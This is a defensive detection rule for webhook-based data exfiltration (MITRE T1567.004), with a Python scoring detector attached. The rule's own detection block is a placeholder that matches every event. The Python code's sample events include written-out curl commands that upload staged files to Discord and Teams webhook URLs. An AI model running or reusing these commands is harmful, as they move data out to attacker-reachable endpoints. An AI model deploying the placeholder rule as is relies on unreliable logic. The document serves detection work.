title: Exfiltration Over Webhook (T1567.004)
id: df00tech-t1567-004
status: experimental
description: "Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple HTTP/S push mechanisms supported by collaboration platforms such as Discord, Slack, and Microsoft Teams, and by generic services such as webhook.site. Adversaries abuse these endpoints either by linking an adversary-controlled webhook to a victim-owned SaaS service for automated, repeated exfiltration of emails or chat messages, or by manually posting staged data directly to a webhook URL with scripting tools. Because webhook traffic is HTTPS and destined for widely trusted SaaS domains, it blends with normal enterprise traffic and often bypasses data loss prevention controls. Observed real-world usage includes Discord webhooks for credential and token exfiltration from malicious npm packages, Slack webhooks used by insider threats, and Microsoft Teams webhooks abused via SQL Server xp_cmdshell lateral movement chains."
references:
  - https://attack.mitre.org/techniques/T1567/004/
  - https://df00tech.com/detections/T1567.004
author: df00tech
date: 2026/04/21
tags:
  - attack.t1567.004
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - Legitimate DevOps and CI/CD pipelines posting build status notifications to Slack or Teams webhooks via scripts or pipeline agents
  - "IT monitoring and alerting tools (PagerDuty integrations, Grafana alerting, custom scripts) sending operational alerts to collaboration webhooks"
  - "Developer workstations testing webhook integrations during application development, especially when using webhook.site or requestbin as debug targets"
  - Authorized security tools performing phishing simulations or red team exercises that post results to team notification webhooks
  - "Business automation scripts (Zapier alternatives, custom workflow tools) that legitimately transfer structured data to webhooks"
level: high
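Detection logic for the technique described above, as an added example that is not part of the df00tech rule or the referenced KQL/SPL query: it scores process_creation events by webhook URL pattern, HTTP client, payload flag and parent process, and down-weights the CI/CD service accounts named under falsepositives. The webhook URL regexes, the allowed service-account names and the sample events are constructed assumptions.

```python
import re
from typing import Optional

# Webhook URL shapes for the platforms named in the rule description (regexes are assumptions).
WEBHOOK_HOSTS = {
    "discord":      re.compile(r"discord(?:app)?\.com/api/webhooks/", re.I),
    "slack":        re.compile(r"hooks\.slack\.com/services/", re.I),
    "teams":        re.compile(r"\.webhook\.office\.com/webhookb2/", re.I),
    "webhook.site": re.compile(r"\bwebhook\.site/", re.I),
}
# Command-line HTTP clients commonly used to push data from a host.
HTTP_CLIENTS = re.compile(r"\b(curl|wget|invoke-restmethod|invoke-webrequest|irm|iwr)\b", re.I)
# Flags indicating the request carries a body or file upload.
PAYLOAD_FLAGS = re.compile(r"(?:-F\s|-d\s|--data|-T\s|-InFile|-Body)", re.I)
# Service accounts expected to post to webhooks (the CI/CD false positives); assumed names.
ALLOWED_USERS = {r"corp\svc_jenkins", r"corp\svc_grafana"}

def analyze(event: dict) -> Optional[dict]:
    """Score one process_creation event; return a finding or None when no webhook URL is present."""
    cmd = event.get("CommandLine", "")
    platform = next((name for name, rx in WEBHOOK_HOSTS.items() if rx.search(cmd)), None)
    if platform is None:
        return None
    score = 1
    if HTTP_CLIENTS.search(cmd):
        score += 1
    if PAYLOAD_FLAGS.search(cmd):
        score += 1
    # SQL Server (xp_cmdshell) or Office apps spawning an uploader is strong context.
    parent = event.get("ParentImage", "").lower()
    if parent.endswith(("sqlservr.exe", "winword.exe", "excel.exe", "outlook.exe")):
        score += 2
    if event.get("User", "").lower() in ALLOWED_USERS:
        score -= 2
    level = "high" if score >= 3 else "medium" if score == 2 else "low"
    return {"platform": platform, "score": score, "level": level, "user": event.get("User")}

def scan(events: list) -> list:
    """Evaluate a batch of events and return findings ordered by level (high first)."""
    order = {"high": 0, "medium": 1, "low": 2}
    hits = [f for f in (analyze(e) for e in events) if f]
    return sorted(hits, key=lambda f: order[f["level"]])

SAMPLE_EVENTS = [  # constructed sample events, not real telemetry
    {"User": r"CORP\bob", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'curl.exe -F "file=@C:\staging\docs.zip" https://discord.com/api/webhooks/000/REDACTED'},
    {"User": r"CORP\svc_jenkins", "ParentImage": r"C:\jenkins\agent.exe",
     "CommandLine": "powershell -c Invoke-RestMethod -Uri https://hooks.slack.com/services/T000/B000/X -Method Post -Body $json"},
    {"User": r"NT AUTHORITY\SYSTEM", "ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "CommandLine": "cmd.exe /c curl -d @out.txt https://corp.webhook.office.com/webhookb2/REDACTED"},
    {"User": r"CORP\alice", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\Git\bin\git.exe" push origin main'},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```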
